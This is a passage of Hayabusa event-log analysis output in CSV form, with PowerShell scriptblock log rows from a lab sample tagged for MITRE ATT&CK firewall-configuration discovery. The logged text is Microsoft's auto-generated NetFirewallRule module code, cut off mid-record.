$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.Conta",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', 
$__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 